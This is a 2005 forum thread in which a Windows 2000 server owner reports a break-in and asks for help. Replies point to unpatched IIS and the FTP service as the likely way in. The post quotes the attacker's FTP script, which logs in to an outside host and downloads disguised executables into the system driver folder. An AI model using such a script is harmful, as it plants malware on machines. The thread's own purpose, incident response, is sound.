Security Breach

I am running windows 2k adv server, running iis , cold fusion, sql server 2k, zone alarm file, netopia cayman 5300 series router and remote admin. I just noticed a file C:\\MSSQL_Script.txt which is requesting ftp access to download some malicious file.. My Questions

I rebuilt my PC from a backup but the file just re-appeared again.

1) Does any know how they might have gotten in. i only have port 80,443,20,21 opened 2) how do hacker schedule jobs. Cos i didn notice a recp.exe program requesting access also. 3) Can some help with the next steps i need to take.

Thanks

content of file

open ftp.cybton.com USER mkeoma uvrlSN USER mkeoma uvrlSN binary get /mowl/MSIntskmngr.exe C:\\winnt\\system32\\driver\\MSIntskmngr.exe get /mowl/mspaintfixd.tmp C:\\winnt\\system32\\driver\\mspaintfixd.tmp get /mowl/net.exe C:\\winnt\\system32\\driver\\net.exe get /mowl/notepadc.xcl C:\\winnt\\system32\\driver\\notepadc.xcl quit open ftp.cybton.com USER eazy VEDgFT binary get /mowl/MSIntskmngr.exe C:\\winnt\\system32\\driver\\MSIntskmngr.exe get /mowl/mspaintfixd.tmp C:\\winnt\\system32\\driver\\mspaintfixd.tmp get /mowl/net.exe C:\\winnt\\system32\\driver\\net.exe get /mowl/notepadc.xcl C:\\winnt\\system32\\driver\\notepadc.xcl quit

Reply to
quest
Loading thread data ...

I couldn't see exact specifications, but that router doesn't look to be much of a firewall, probably only SPI, and Zone Alarm is a software based SPI firewall with its own limitations. So you need to make sure either all applications facing the internet (ie those on ports 80, 443, 20, and 21) are fully patched, or need to look at a firewall with Intrusion Detection capabilities (ie Netscreen/Sonicwall/Fortinet).

Reply to
Mark

quest wrote on 28 Jun 2005 19:06:59 -0700:

Best guess, IIS. Have you got it fully patched? Are you running any of the add-on tools like URLScan or IISLockDown? I assume that you're using the IIS FTP service too, that's a possible injection point and personally I wouldn't run that software on my system.

And why oh why are you running ZoneAlarm on what is obviously a public server. If you got enough cash to run 2K Advanced Server on it, surely you can shell out for a decent hardware firewall.

Dan

Reply to
Spack

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.